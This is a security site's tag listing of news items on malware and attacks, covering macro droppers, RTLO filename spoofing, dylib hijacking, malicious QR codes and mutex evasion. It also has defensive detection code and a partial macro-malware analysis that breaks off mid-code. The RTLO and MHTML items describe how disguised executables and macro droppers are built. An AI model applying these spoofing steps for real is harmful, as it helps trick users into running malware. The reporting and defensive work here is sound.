Showing results for tags 'malicious'.
Found 19 results

  1. Vulnerabilities in the Google App Engine cloud platform make it possible for attackers to break out of a first-level security sandbox and execute malicious code in restricted areas of Google servers, a security researcher said Friday. Adam Gowdiak, CEO of Poland-based Security Explorations, said there are seven separate vulnerabilities in the Google service, most of which he privately reported to Google three weeks ago. So far, he said, the flaws have gone unfixed, and he has yet to receive confirmation from Google officials. To exploit the flaws, attackers could use the freely available cloud platform to run a malicious Java application. That malicious Java app would then break out of the first sandboxing layer and execute code in the highly restricted native environment. Malicious hackers could use the restricted environment as a beachhead to attack lower-level assets and to retrieve sensitive information from Google servers and from the Java runtime environment. Technical details about the bugs, noted as issues 35 through 41, are available here, here, here, and here. In an e-mail to Ars, Gowdiak wrote: Gowdiak took to the Full Disclosure e-mail list to disclose the bugs and to call Google out for not responding to his private advisory, which he said included proof-of-concept exploit code. "It's been 3 weeks and we haven't heard any official confirmation / denial from Google with respect to Issues 37-41," Gowdiak wrote. "It should not take more than 1-2 business days for a major software vendor to run the received POC, read our report and / or consult the source code. This especially concerns the vendor that claims its 'Security Team has hundreds of security engineers from all over the world' and that expects other vendors to react promptly to the reports of its own security people." Google has received criticism in the past when its Project Zero has disclosed vulnerabilities in Windows and Mac OS X before Microsoft and Apple had patched them. 
Asked for comment on Gowdiak's Full Disclosure post, a Google spokesman issued the following statement: "A researcher recently reported a known issue affecting a preliminary layer of security in Google App Engine. We’re working with him to mitigate it; users don’t need to take any action." Source
  2. Apparently harmless document files that contain a malicious macro are commonly used by cybercriminals to distribute malware. However, malicious actors continue to improve their methods in an effort to evade detection. Security researcher Bart Blaze has come across a bogus invoice spam email apparently containing a Microsoft Word document (.doc). When the document is opened, if macros are not enabled, the user is instructed to enable macros in order to view the content. Once macros are enabled, the victim is presented with an image, while in the background a piece of malware is downloaded onto the computer. It’s worth noting that macros are disabled by default in Microsoft Office. Attaching malicious macros to documents is not uncommon, but the sample analyzed by Blaze is a bit different. The document is actually an MHTML, or a Multi-Purpose Internet Mail Extension (MIME) HTML file. MHTML (.mht) is a web page archive format used to combine HTML code and other resources (e.g. images, Java applets and Flash animations) in a single document. The malicious MHTML file contains an MSO object, which in turn contains an OLE object. When the file is launched, a VBS file is downloaded from Pastebin and executed. The VBS file is designed to download and execute a Trojan downloader, which in turn downloads a piece of malware. VirusTotal links provided by Blaze suggest that the final payload is a banking Trojan. The expert told SecurityWeek that the threat is very likely the notorious Dyre. The researcher has noted that attackers can build such malicious documents by creating an MHT file, appending the MSO object at the end, and renaming the resulting file with a .doc extension. The developer of olevba, a tool designed for the analysis of malicious macros hidden inside Microsoft Office documents, has pointed out that there is an even easier method. 
Cybercriminals can open a Word document with macros, save it as an MHTML from Word, and rename the file extension from .mht to .doc. Belgium-based researcher Didier Stevens, the developer of the OLE file analysis tool oledump, noted in a blog post that MSO files containing OLE files were previously seen in March, when cybercriminals were using XML Office documents to distribute the Dridex financial malware. “It seems obvious that malware authors are keeping up-to-date with the latest news and as such adapting their campaigns as well. Better be safe than sorry and don't trust anything sent via email,” Blaze advised in his blog post. “If you're in an organisation, you might want to consider blocking the execution of all macros (or only the ones that are digitally signed) by using GPO.” Source
  3. In this article we will learn about one of the most overlooked spoofing mechanisms, known as right to left override (RTLO).

What is RTLO?

RIGHT TO LEFT OVERRIDE is a Unicode character mainly used for the writing and reading of Arabic or Hebrew text. Unicode has a special character, U+202E, that tells computers to display the text that follows it in right-to-left order. This vulnerability is used to disguise the names of files and can be attached to a carrier like email. For example, the file name ThisIsRTLOfileexe.doc is actually ThisIsRTLOfiledoc.exe, which is an executable file with a U+202E placed just before “doc.” Though some email applications and services that block executable files from being included in messages also block .exe programs that are obfuscated with this technique, unfortunately many mail applications don’t or can’t reliably scan archived and zipped documents, and the malicious files manipulated in this way are indeed being spammed out within zip archives.

For example, let’s create a file named TestingRTLO[U+202E]xcod.txt. “U+202E” can be copied and pasted from the Character Map present in Windows. To make sure something is present in the character, do the following steps: Create a new text document, see its properties and note down its name. Now rename the file with the copied U+202E character and see the change in the file name. Now rename the file TestingRTLO[U+202E]xcod.txt with the character inserted and see the results.

File extension types that can be dangerous

The section below lists the common file types that can be used to execute unwanted code on the system: .bat, .exe, .cmd, .com, .lnk, .pif, .scr, .vb, .vbe, .vbs, .wsh

Remediation against RTLO

Though most endpoint security solutions like antivirus detect this type of spoofing, and some IRC clients even change the crafted malicious links back to their original form, many mail applications don’t or can’t reliably scan archived and zipped documents, and the malicious files manipulated in this way are indeed being spammed out within zip archives. The biggest example of this is the usage of the backdoor “Etumbot”. Some features of Windows also help to carry out this type of attack, such as Windows hiding file extensions by default. Malicious individuals can set any icon they want for, let’s say, a .exe file. A file named pic.jpg.exe using the standard image icon will look like a harmless image with Windows’ default settings. Uncheck this selection and Windows will stop hiding extensions for known file types. Another good approach is to make sure that the folder where all the downloads take place has its view set to ‘Content’. This will make sure that the files appear in their original form despite all the changes. Though this technique is a bit old, it is still being used in backdoors like Etumbot, malware known as Sirefef, etc. Source
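The RTLO trick described in the post above can be caught on the receiving side by inspecting attachment names for Unicode bidirectional control characters and comparing what a file manager would display with the extension the OS actually acts on. The following is an added example, not code from the article: the `BIDI_CONTROLS` table, the simplified rendering model in `displayed_name`, and the constructed sample names are this example's own assumptions; the dangerous-extension list is the one the post gives.

```python
# Added example (not from the article): flag attachment names that use Unicode
# bidi override characters or a double extension to disguise an executable.

# Extensions the article lists as able to execute unwanted code on Windows.
DANGEROUS_EXTENSIONS = {"bat", "exe", "cmd", "com", "lnk", "pif", "scr",
                        "vb", "vbe", "vbs", "wsh"}

# Unicode bidirectional control characters. U+202E (RLO) is the one the article
# describes; the rest are related embeddings/isolates that also alter display order.
BIDI_CONTROLS = {
    "\u202a": "LRE", "\u202b": "RLE", "\u202c": "PDF", "\u202d": "LRO", "\u202e": "RLO",
    "\u2066": "LRI", "\u2067": "RLI", "\u2068": "FSI", "\u2069": "PDI",
    "\u200e": "LRM", "\u200f": "RLM",
}


def displayed_name(name):
    """Approximate what a file manager shows: after an RLO (U+202E) the text is
    rendered reversed until a PDF (U+202C) or the end of the string. This is a
    simplified model of the bidi algorithm, enough to expose the spoof."""
    out = []
    i = 0
    while i < len(name):
        ch = name[i]
        if ch == "\u202e":
            end = name.find("\u202c", i + 1)
            if end == -1:
                out.append(name[i + 1:][::-1])
                break
            out.append(name[i + 1:end][::-1])
            i = end + 1
            continue
        if ch in BIDI_CONTROLS:      # other controls are invisible; drop them
            i += 1
            continue
        out.append(ch)
        i += 1
    return "".join(out)


def actual_extension(name):
    """Extension the OS will act on: controls stripped, text after the last dot."""
    clean = "".join(ch for ch in name if ch not in BIDI_CONTROLS)
    return clean.rsplit(".", 1)[1].lower() if "." in clean else ""


def analyze_filename(name):
    controls = sorted({BIDI_CONTROLS[ch] for ch in name if ch in BIDI_CONTROLS})
    ext = actual_extension(name)
    clean = "".join(ch for ch in name if ch not in BIDI_CONTROLS)
    return {
        "displayed": displayed_name(name),
        "actual_extension": ext,
        "bidi_controls": controls,
        "executable": ext in DANGEROUS_EXTENSIONS,
        # pic.jpg.exe style: a benign-looking extension before the real one
        "double_extension": clean.count(".") >= 2 and ext in DANGEROUS_EXTENSIONS,
        "flag": bool(controls) or ext in DANGEROUS_EXTENSIONS,
    }


def scan_attachments(names):
    """Return the names worth quarantining from a list of attachment names."""
    return [n for n in names if analyze_filename(n)["flag"]]


# Constructed sample names (the first two mirror the article's examples).
SAMPLE_NAMES = [
    "ThisIsRTLOfile\u202Ecod.exe",   # shown as ThisIsRTLOfileexe.doc
    "TestingRTLO\u202Excod.txt",     # shown as TestingRTLOtxt.docx
    "pic.jpg.exe",                   # relies on hidden extensions + image icon
    "report.pdf",
]

if __name__ == "__main__":
    for n in SAMPLE_NAMES:
        print(repr(n), "->", analyze_filename(n))
```

Any bidi control in a filename is flagged even when the real extension is harmless, since there is no legitimate reason for one to appear in an attachment name; the `executable` and `double_extension` fields let a mail gateway apply a stricter policy to the cases that can actually run code.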
  4. With the increasing use of smartphones, QR codes are becoming popular. Recently, WhatsApp launched its web version, which needs QR code scanning to access the web version of WhatsApp. So, many people now know what a QR code is, but still more are unaware. It is very similar to a bar code we see on products, but it does not need a different reader. Our smartphone camera can easily read it with the help of a QR code scanner app. Due to fast readability, it is now widely accepted. And the use of QR codes is increasing. With the scan of a QR code, we can perform various tasks which would otherwise need a lot more effort. For example, scan a QR code and save the business card details in your smartphone. This is why people like to use QR code scanning for general tasks. But most users are not aware that QR codes can also be malicious. This is why scammers are now using malicious QR codes for tricking users. In this article, I will discuss QR codes in detail. I will also try to cover all the potential security issues related to QR codes.

QR Codes

A QR code (or Quick Response code) is a matrix bar code which can be read by an imaging device (camera) and then processed to read its data. It was initially developed for the automotive industry in Japan, but now it is being used by many companies. You will be surprised to know that the QR code was invented back in 1994 by Denso Wave. Nowadays QR codes are being used to display text to users, to save vCard contact information to the user’s smartphone, to open a website URL, to code payments, for website login (e.g. WhatsApp web login) or to compose an e-mail or text message just by scanning a QR code. QR codes are really useful and help us to complete tasks faster on smartphones. You can quickly open a website just by scanning a QR code and you do not need to manually type the URL in your smartphone. This is why many websites’ poster ads now contain a QR code. Another popular use is on a business card. Now people also include a QR code in their business cards, so other persons can simply scan the QR code to save the contact details in their smartphone. See the sample QR code below. This is for opening a website. QR code for: IT Security Training & Resources by InfoSec Institute. Scanning the above QR code will open IT Security Training & Resources by InfoSec Institute.

How to Generate QR Codes

There are various tools available for this. If you want to generate a QR code with specific information, you can use these tools, which let you create QR codes for URL, text, vCard, SMS, call, geo-location, event, email and login. Different tools have different abilities. A few good QR code generator tools are:

https://www.the-qrcode-generator.com/
QR Code Generator – create QR codes for free (Logo, T-Shirt, vCard, EPS)
QR Code Generator - Create QR codes here
http://www.qrstuff.com/
https://scan.me/qr-code-generator

You can use any of the above tools to generate your own QR code.

Lifespan of QR codes

This is a question about QR codes people generally ask. A QR code does not need any platform for redirection, but it has data within it. Once a QR code is generated, it can be used anytime, anywhere. The lifespan of QR codes is unlimited, so you do not need to worry about lifespan. Generate and then use.

Can QR codes be hacked?

A QR code is a square matrix with an arrangement of small black square dots. Hacking a QR code means manipulation of the action without modifying the QR code. This is not possible. QR codes can be malicious and can trigger malicious action. But that QR code will not be the same as the legitimate QR code. Two QR codes with different actions will never be the same. You will certainly see different patterns in both QR codes. So, QR codes cannot be hacked. But they can be malicious and hackers can use a QR code for various malicious purposes. And there are various reports in which we have seen the malicious acts.

Security Risks Involved with Use of QR Codes

As I already discussed, QR codes can be malicious. So, there are various security risks involved with QR codes. In this section, I will discuss all the security risks involved with QR codes.

Phishing

Phishing is a popular way of hacking web accounts. Attackers send a fake web login page which pretends to be the original login page of the website it’s claiming to be. When an innocent user uses this fake page to log in, his/her login information is sent to the attacker. And now, his/her password is in the hands of the attacker. Phishing is the main security issue involved with QR codes. It is also described as QRishing by some security researchers. QR codes are generally scanned by a smartphone camera to visit a website. Now, many website ads put a QR code along with a URL so users can quickly scan the QR code to visit the website. This is where scammers try to trick users. As I already told you, QR codes cannot be hacked. So, hackers or scammers try to change the QR code added in the poster. They can also print similar kinds of fake posters and put them in public places. Innocent customers will scan these fake QR codes to visit the websites but they will be redirected to phishing websites. Most people judge a website by its look and feel, and phishing pages look exactly similar to legitimate websites. On mobile devices, it is hard to check the full address in the browser. Due to limited space, browsers do not show the full address in the URL field. And most people never try to check the full address. This makes users more vulnerable. When they use this phishing page to log in, their passwords are compromised. Although this phishing trick has limited scope, it is most effective. There are various case studies which clearly confirm that people generally trust QR codes and become the victims of QRishing in public places.

Malicious software distribution

Scammers generally use malicious websites to distribute malware via drive-by download attacks. Nowadays, most drive-by download attacks are being done against Android users. Drive-by download attacks are attacks in which a website forcefully downloads software to your device when you visit the website. It does not need any action from the user’s side. Visiting the website is enough to trigger the download action. Scammers try to install malicious apps and then exploit that device. These infected devices can join an existing botnet or can send SMS to premium numbers. It can also leak your data. By using QR codes to point to this kind of malicious website, we can easily trick users. Users cannot see the URL, so there is no point of doubt. With QR codes, there is no need to enter the URL manually; users only scan the QR code. And they only know what you will write about the QR code. In Russia, a malicious QR code on scanning sent SMS to premium numbers costing $5 USD per SMS. Most of these kinds of attacks have been seen against Android devices.

Pointing to potentially harmful websites

This is similar to what we learned in the previous point, but it is not about serving malware. Sometimes websites have browser exploits which can do a lot more harm. Browser exploits can enable microphone/camera access, access browser data, send emails or join a botnet to perform a DDoS attack on any legit website. All these actions occur in the background, so users never know about this. They will only see a website, but they are being tricked.

How to Protect Yourself from Malicious QR Codes

Malicious QR codes have limited scope, but may be harmful. So, you need to be protective and always take care of your security while using QR codes. If you are going to use them from banners in public places, you need to be selective. There are a few things which you can do to protect yourself from malicious QR codes and their attacks.

Observe before use: If you find a QR code in any banner advertisement in a public place, look at it closely. Most of the time, scammers stick their fake QR code above the legitimate QR code on a legitimate poster. So try to see if it is real or not. You can check by touching the poster. If it does not look like it’s actually printed on the poster, do not use it. Follow this guideline for QR codes in public places. Your observation can save you from attacks. If you are not sure, never scan that QR code.

Be suspicious and never give personal or login info: Always be suspicious of the page you land on via a QR code. Never share your personal information on these pages. Only do this if the QR code is from a very trusted source and you trust the website. And yes, avoid entering your login information. It may be a phishing page. So for login, always enter the URL manually in the browser’s address bar. Entering login information on the pages you land on via a QR code means putting yourself in big trouble. So, why take the risk just to avoid a little extra effort? Open a browser, type the address and log in directly on the website.

Look at the URL before proceeding: A few QR code scanners also show the actual URL before proceeding and ask you to confirm whether you want to visit the URL. You can use these QR code scanners to know what URL the QR code will send you to. This will help you to know if the QR code is malicious or not. Looking at the QR code does not confirm whether it is malicious or not. So, I recommend the use of safe QR code scanners. Norton Snap is a nice QR code scanner app with built-in security features. This app is available for both Android and iOS platforms. You can use this QR code scanner app to prevent any malicious activity in your smartphone. It not only shows the URLs but also checks the URLs against its database of malicious links. If it finds any malicious URLs within the QR code, it will warn you.

Conclusion

Although QR codes are not new, their use is still very limited. With the increasing use of smartphones, we have seen a sudden rise in the use of QR codes. Now various websites and apps let users use a QR code to log in or complete other tasks. But there are still very few users who use QR codes. This is the reason why there is little reporting on malicious QR codes. Nobody wants to waste time on things which have low impact. But this will change very soon. With the launch of WhatsApp for web, now many users know how to use QR codes. So, we can expect another sudden rise in the use of QR codes. And when it is used by a greater number of users, attackers will surely find new ways to exploit its weaknesses. As of now, QR code risks have limited scope, but when there are more users, it will surely become a bigger risk. In the near future, we will also see the use of QR codes for payments and money transfer. At that time, it will be very important to follow security rules. As of now, we only need to use a good and secure QR code scanner app and then relax. Having a good anti-virus and Internet security app is also recommended. This will warn you if a website is a phishing website or is trying to install a dangerous app on your smartphone. I hope you have found this article interesting. If you use QR codes, do not forget to be safe.

References
http://usa.kaspersky.com/about-us/press-center/press-blog/malicious-qr-codes-attack-methods-techniques-infographic
https://www.andrew.cmu.edu/user/nicolasc/publications/Vidas-USEC13.pdf
http://en.wikipedia.org/wiki/QR_code

Source
  5. Researchers have seen an uptick in Adobe Flash .SWF files being used to trigger malicious iFrames across websites. Several hundred WordPress and Joomla websites have been swept up in the campaign, first observed by researchers at the firm Sucuri last November. “Though it’s uncertain how many iterations existed in the wild when we first reported the issue, this time we’ve found a lot of websites where the infection looks similar,” Peter Gramantik, a senior malware researcher at the firm wrote Thursday. According to Gramantik the infection is clearly marked by a .SWF file with three random characters as a name that’s stored in a site’s images/banners/ folder. As far as the firm has seen, each file has a random hashed ID parameter attached to the end of it. While the malware’s variable names, coding logic, and UserAgent remain the same, one of the main differences between last November’s version of the campaign and this one is that this incarnation has spread from Joomla sites to WordPress sites. As is to be expected, the website delivering the malicious payload has changed as well. The .SWF files, also known as small web format files, inject an invisible iFrame, which can go on to drop other exploits. Source
  6. President Barack Obama has ordered the shoring up of sanctions that the US could use against individuals and nations that attack the country with cyber tools and threats. No new sanctions have been created, but Obama is keen to see existing measures applied with more force and frequency. The US has used these tools before, and they were raised during discussions about the alleged North Korea attack on Sony Pictures. The president presents his actions as a reaction to the real menace that is growing in scale and capability and continues to hurt US firms like Home Depot. "I find that the increasing prevalence and severity of malicious cyber-enabled activities originating from, or directed by, persons located, in whole or in substantial part, outside the US constitute an unusual and extraordinary threat to the national security, foreign policy and economy of the US. I hereby declare a national emergency to deal with this threat," he said. The response is a greater use of sanctions, and an increase in the powers available to the government, according to a White House blog post. "We are at a transformational moment in how we approach cyber security. The actions we take today will help ensure that the internet remains an enabler of global commerce and innovation," said Lisa Monaco, US homeland security advisor to president Obama. "We need to deter malicious cyber activity and to impose costs in response to the most significant cyber intrusions and attacks, especially when those responsible try to hide behind international boundaries. "Effective incident response requires the ability to increase the costs and reduce the economic benefits from malicious cyber activity. We need a capability to deter and impose costs on those responsible for significant harmful cyber activity where it really hurts - at their bottom line." 
Businesses such as the US Postal Service have been attacked with greater frequency over the past year and, while international entities are not always blamed, China is a regular suspect. Sanctions can be imposed against a nation or an individual, and they are expected to be used only at times when US assets and infrastructure are under threat. Source
  7. DLL hijacking has plagued Windows machines back as far as 2000 and provides hackers with a quiet way to gain persistence on a vulnerable machine, or remotely exploit a vulnerable application. And now it’s come to Apple’s Mac OS X. This week at the CanSecWest conference in Vancouver, Synack director of research Patrick Wardle is expected to deliver a talk during which he’ll explain different attacks that abuse dylibs in OS X for many of the same outcomes as with Windows: persistence; process injection; security feature bypass (in this case, Apple Gatekeeper); and remote exploitation. “DLL hijacking has haunted Windows for a while; it’s been abused by malware by a number of malicious adversaries. It’s a fairly widespread attack,” Wardle told Threatpost. “I wondered if it was similar on OS X and I found an attack similar to that. Under the hood, there are technical differences, but it provides the same capabilities. Given you have a vulnerable app on OS X, you can abuse it the same way it’s abused on Windows.” Wardle is also expected to release, following his talk, source code for a scanner that discovers apps that are vulnerable to his attack. Running his Python script against his own OS X machine, Wardle was able to find 144 binaries vulnerable to different flavors of his dylib hijacking attacks, including Apple’s Xcode, iMovie and Quicktime plugins, Microsoft Word, Excel, and PowerPoint, and third-party apps such as Java, Dropbox, GPG Tools and Adobe plugins. “Windows is vulnerable to DLL hijacking, and now OS X is similarly vulnerable to dylib hijacking,” Wardle said. With DLL and dylib attacks, the concept is essentially the same: an attacker must find a way to get a malicious library into a directory that is loaded by the operating system. Wardle explained one facet of his attack where he was able to find a vulnerable Apple binary in its Photostream Agent that automatically started with iCloud. “It’s perfect for attacker persistence,” Wardle said. 
“You copy a specially crafted dylib into the directory PhotoStream looks for when the app starts, and the attacker’s dylib is loaded into the context of the process. It’s a stealthy way to gain persistence; you’re not creating any new processes, nor modifying any files. You’re planting a single dylib and you’re in.” In another attack, Wardle said he was able to gain automatic and persistent code execution via a process injection against Xcode, Apple’s integrated developer environment. “My malware infects Xcode and any time a developer deploys a new binary, it would also add the malicious code,” Wardle said. “It’s an anonymous propagation vector.” Wardle was also able to remotely bypass Apple’s Gatekeeper security product that limits what software can be downloaded onto an Apple machine and from where, in addition to providing antimalware protection. His malicious dylib code, he said, would be implanted in a download that should be blocked by Gatekeeper because it’s not signed from the Apple App Store. Gatekeeper, however, will load the malicious file remotely giving the attacker code execution, Wardle said. “Gatekeeper normally does a pretty good job of blocking these downloads, but now using this bypass, we can get users to infect themselves,” Wardle said. Wardle is expected to demonstrate an attack that combines all of these components, including the Gatekeeper bypass that when executed uses the dylib hijacking to gain persistence, grabs users’ files and exfiltrates that data to iCloud, and can also send remote commands to the vulnerable machine. Most worrisome, he said, is that his malware went undetected by most antivirus packages, and Apple barely acknowledged his bug reports starting in January other than an automated response, and a thank you and congratulations on his talk being accepted at CanSecWest. “I think things are broken. This abuses legitimate functionality of OS X and it’s not patched,” Wardle said. 
“These attacks are powerful and stealthy, and do a lot of malicious things.” Source
  8. Malware analysts have had a measure of success using static mutex values as a fingerprint for detecting and blocking malicious code. These values are used in programming to enable software to synchronize communication between multiple threads or processes, or to determine whether another instance of a program is running already. There’s better reliability in using a mutex object in this way than checking for the presence of a process name, which could change. Malware writers, however, may have caught on to this fingerprinting technique. Lenny Zeltser, a SANS Institute instructor, said a malware sample he was examining dynamically generates the name of a mutex object by using the product ID associated with the software, lessening its predictability and complicating detection. “Given that malware analysts know to look for mutex names for ‘fingerprinting’ malicious software, it’s natural that authors of such programs will start shifting their techniques,” Zeltser said. “The technique that this malware used to generate the mutex name wasn’t especially elaborate, but it made it harder for the defenders to use this attribute for defending or investigating the system.” Malware evasion techniques are the epitome of the cat-and-mouse game between hackers and researchers. The LogPOS point-of-sale malware is a recent example of the constant evolution on the attackers’ side. The malware makes use of a Windows technology called mailslots to create a webserver; additional code is injected into various processes and acts as a client that moves stolen credit card data to the mailslot which then sends it to the attackers’ command and control infrastructure. Last October, academics at the University of California at Santa Barbara, made a plea for defenders to begin working on technology that spots evasive behavior. Security systems, said Giovanni Vigna, director of the Center for Cybersecurity at UCSB, must eventually elicit malicious behavior from malware before it executes. 
“The dynamic of action-reaction is common in the world of information security: The defenders find a way of interfering with the attackers, the attackers adjust tactics, the defenders tweak our methods, the attackers react, etc,” Zeltser said. Zeltser studied a malware sample called TreasureHunter and today in a post on the SANS Internet Storm Center website, he describes how the malware transforms a computer’s specific Windows Product ID into a string that serves as the basis for its mutex. Not all malware samples make use of mutex objects, but those that do have until now hardcoded the name. Backoff, probably the most notorious point-of-sale malware in the wake of the mega Target and Home Depot breaches, named its mutexes in ways that were known to incident responders, Zeltser said. This scenario simplified detection for malware analysts, enabling them to use mutex names as indicators of compromise for Backoff infections, he said. For an attacker, the use of a static, hardcoded mutex name also allows multiple instances of malicious code running on the infected host to refer to the same mutex, Zeltser said. TreasureHunter, he said, is the first time he’s seen malware move away from this static approach. “The author of TreasureHunter decided to use a more sophisticated approach of deriving the name of the mutex based on the system’s Product ID,” Zeltser explained in his post. “This helped the specimen evade detection in situations where incident responders or anti-malware tools attempted to use a static object name as the indicator of compromise.” Source
  9. OpenDNS has gone public with a new tool that uses a blend of analytics principles found outside information security to create a threat model for detecting domains used in criminal and state-sponsored hacking campaigns. NLPRank is not ready for production, said OpenDNS director of security research Andrew Hay, but the threat model has been proven out and false positives kept in check to the point where Hay and NLPRank’s developer Jeremiah O’Connor were satisfied that it could be shared publicly. What separates NLPRank from other analytics software that searches, for example, for typo-squatting domains used in phishing attacks, is that the OpenDNS tool also relies on natural language processing, ASN mappings, WHOIS domain registration information, and HTML tag analysis to weed out legitimate domains from the bad ones. The data comes from OpenDNS’ massive storehouses of DNS traffic (70 billion DNS queries daily), as well as from other sources provided by researchers investigating APT campaigns, for example. The spark for NLPRank’s development was a repeating pattern of evidence from a number of phishing attacks used to gain a foothold for APT groups. Certain themes such as fraudulent social media accounts or password reset requests purporting to be from popular services such as Facebook or PayPal were used to add urgency for the potential victim, enticing them to follow the link to trouble. “Using this malicious language and applying analysis to the domains, we can start picking them off prior to a campaign launching,” Hay said. O’Connor shared details in a blog post on the science behind the analytics, including algorithms used in bioinformatics and data mining, natural language processing techniques that allow him to develop a dictionary of malicious language used in these campaigns that helps the tool predict malicious domain activity. 
“NLPRank is designed to detect these fraudulent branded domains that often serve as C2 domains for targeted attacks,” O’Connor wrote, adding that the tool uses a minimum edit-distance algorithm used in spell-checkers and other applications to whittle down words used for typo-squatting domains and legitimate domains. “The intuition behind using this algorithm is that essentially we’re trying to define a language used by malicious domains vs. a language of benign domains in DNS traffic,” O’Connor said.

Hay added that the domains used in the recently unveiled Carbanak APT bank heist, with losses anywhere between $300 million and $1 billion, were identified as malicious by NLPRank prior to the campaign going public during the recent Security Analyst Summit. Data from Carbanak, DarkHotel and other APT groups uncovered by Kaspersky Lab are among the data sets used to put NLPRank through its paces.

“This has been incredibly successful in looking at phishing kits that, at face value, are identical to the parent company’s site,” Hay said, stressing that the tool looks at various low-level code, JavaScript hosted on the site, redirects and more in its analysis. “The model picks them off and starts analyzing the data, making sure it’s associated with the parent company, that it was registered by someone associated with the parent domain through the WHOIS information, looking at how embedded HTML may be different versus the parent company and determining how much it deviates from the parent site.”

Eventually the tool will be folded into OpenDNS offerings, but Hay said more analysis capabilities, such as expanded HTML and embedded script analysis, need to be added to further keep false positives at bay. “The false positive rate is low, but it’s not at a point where we are comfortable putting it into production or turning on automated blocking,” Hay said. “We want additional inputs to the model, but so far it’s looking great.”

Source
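The edit-distance idea O’Connor describes, as an added example that is not OpenDNS’s NLPRank code: a minimal scorer that splits a queried hostname into words, measures each word’s Levenshtein distance to a short brand list, and reports lure words found next to a brand look-alike. The brand list, the lure-word dictionary, the allowlist and the query log are all assumed or constructed for illustration; NLPRank additionally uses ASN, WHOIS and HTML signals that this example does not touch.

```python
# Added example, not OpenDNS's NLPRank code: edit-distance scoring of branded lure domains.
# BRANDS, LURE_WORDS and ALLOWLIST are assumed inputs; the query log below is constructed.
import re

BRANDS = ["paypal", "facebook", "google", "apple"]
LURE_WORDS = {"login", "signin", "secure", "verify", "account", "update", "reset", "password"}
ALLOWLIST = {"paypal.com", "facebook.com", "google.com", "apple.com"}


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance (Wagner-Fischer, two rows): insert, delete, substitute cost 1."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def is_allowlisted(domain: str) -> bool:
    """The brand's own registered domain and its subdomains are never flagged."""
    d = domain.lower().rstrip(".")
    return any(d == a or d.endswith("." + a) for a in ALLOWLIST)


def tokens(domain: str):
    """Words of the hostname with the TLD dropped: 'secure-paypa1.net' -> ['secure', 'paypa1']."""
    labels = domain.lower().rstrip(".").split(".")
    host = ".".join(labels[:-1]) if len(labels) > 1 else labels[0]
    return [t for t in re.split(r"[^a-z0-9]+", host) if t]


def brand_threshold(brand: str) -> int:
    """Two edits for long brand names, one for short ones, so 'apps' is not read as 'apple'."""
    return 2 if len(brand) >= 6 else 1


def score_domain(domain: str):
    """(brand, distance, lure words) when the domain looks like a branded lure, else None."""
    if is_allowlisted(domain):
        return None
    toks = tokens(domain)
    hit = None
    for t in toks:
        if len(t) < 4:          # 'www', 'co', 'my' carry no brand signal
            continue
        for b in BRANDS:
            d = edit_distance(t, b)
            if d <= brand_threshold(b) and (hit is None or d < hit[1]):
                hit = (b, d)
    if hit is None:
        return None
    return hit[0], hit[1], sorted(set(toks) & LURE_WORDS)


def scan(domains):
    """Map each flagged domain to its score; unflagged domains are dropped."""
    results = {}
    for d in domains:
        s = score_domain(d)
        if s is not None:
            results[d] = s
    return results


# Constructed query log, not real DNS data.
SAMPLE_QUERIES = [
    "paypa1-login.com", "secure-facebook-reset.net", "www.google.com",
    "payments.paypal.com", "apps.example.com", "example.org",
]

if __name__ == "__main__":
    for domain, (brand, dist, lures) in scan(SAMPLE_QUERIES).items():
        print(f"{domain}: resembles {brand} (distance {dist}), lure words {lures}")
```

Two choices drive the false-positive rate the article worries about: the allowlist check uses the registered domain and its subdomains rather than the bare string, so `www.google.com` never scores, and the edit budget scales with the brand's length, so short words near short brands do not match.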
10. Introduction

Yesterday I received in my company inbox an email with an attached .xlsm file named D92724446.xlsm coming from Clare588@78-83-77-53.spectrumnet.bg. Central and local AV engines did not find anything malicious, and a multiengine scan got 0/57 as a result. I decided to investigate a little more in-depth in order to confirm that it was a malicious file and to extract at least the code I was imagining being inside this document.

General Information

This is some general info collected:

Name: D92724446.xlsm
MD5: fea3ab857813c0d65cd0b6b6233a834b
SHA1: 64eef048efe86fe35f673fd2d853a8a727934e6c
SHA256: 75e3a4cd45c08ff242e2927fa3b4ee80858073a202dade84898040bfbb7847ef
ssdeep: 768:qEIo/BPRS5t1dbQjlshORhynxvWXLUYJdGnSCk:qIJM8jl6nIP
File size: 36.1 KB (36978 bytes)
File type: Office Open XML Spreadsheet

VirusTotal information:
First submission: 2015-02-18 10:35:06 UTC
Last submission: 2015-02-19 08:58:57 UTC
Other names: 93D9B24583.xlsm, e94fcc43b0dc9c7eb350149b4ebdfd3d, 61a47fa44dd55f5721ebe85aa83a32e6, I233185_486.xlsm, L335966_246.xlsm, 271269885.xlsm, 4501B81210.xlsm, e65fb3285617c7b4bbc833a466be6c42, 5312970.xlsm, 9D50B4390.xlsm, DDE1368393.xlsm, E30178611.xlsm, 43c29faad6fc5984273afcc67593d802, FE731885.xlsm, C47394.xlsm, suspect.xls, 090214399.xlsm, Q884674_740.xlsm, E015272_266.xlsm, U506714_083.xlsm, 43925982.xlsm, 8BB4D89313.xlsm.zip, 82AC485705.xlsm, 8abb99eb6078b658e05aece79337378a, 0BF2034112.xlsm

Static Analysis

I started my analysis having a quick look inside: at offset 0 we can quickly view 4 bytes that confirm the format of the file (50 4B 03 04). At this point, I tried to get more information and to see how this document was composed. This quickly confirms my first suspicions: at offset 0x000012f1 a .bin file is found. Going a little further, we can try to get the code of these instructions. The code has been extracted, and different files for Classes and Modules have been created under \OfficeMalScanner\VBAPROJECT.BIN-Macros.
Opening these files with a simple text editor, I immediately found many obfuscated instructions, as reported in the image below. However, after a quick analysis I realized that the modules really important for extracting the malicious code were numbers 11 and 14. This is because module number 11 contains the instructions for running the obfuscated code assigned to the variable named “FfdsfF” and de-obfuscated through the function call “NewQkeTzIIHM”. “NewQkeTzIIHM” takes one string parameter as input and returns a string. These are its main instructions: the -13 immediately brings to mind a de-obfuscation loop which employs the rot13 algorithm. At this point, I simply wrote a few lines of VBS code to correctly extract the content and print it to a txt file called output.txt.

' Append one line of text to output.txt (mode 8 = ForAppending, create if missing)
Function WriteFile(sText)
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objMyFile = objFSO.OpenTextFile("C:\Users\EOSec\Desktop\output.txt", 8, true, 0)
    objMyFile.WriteLine(sText)
    objMyFile.close()
End Function

Dim i, x, y
' The obfuscated string literal taken from module 11
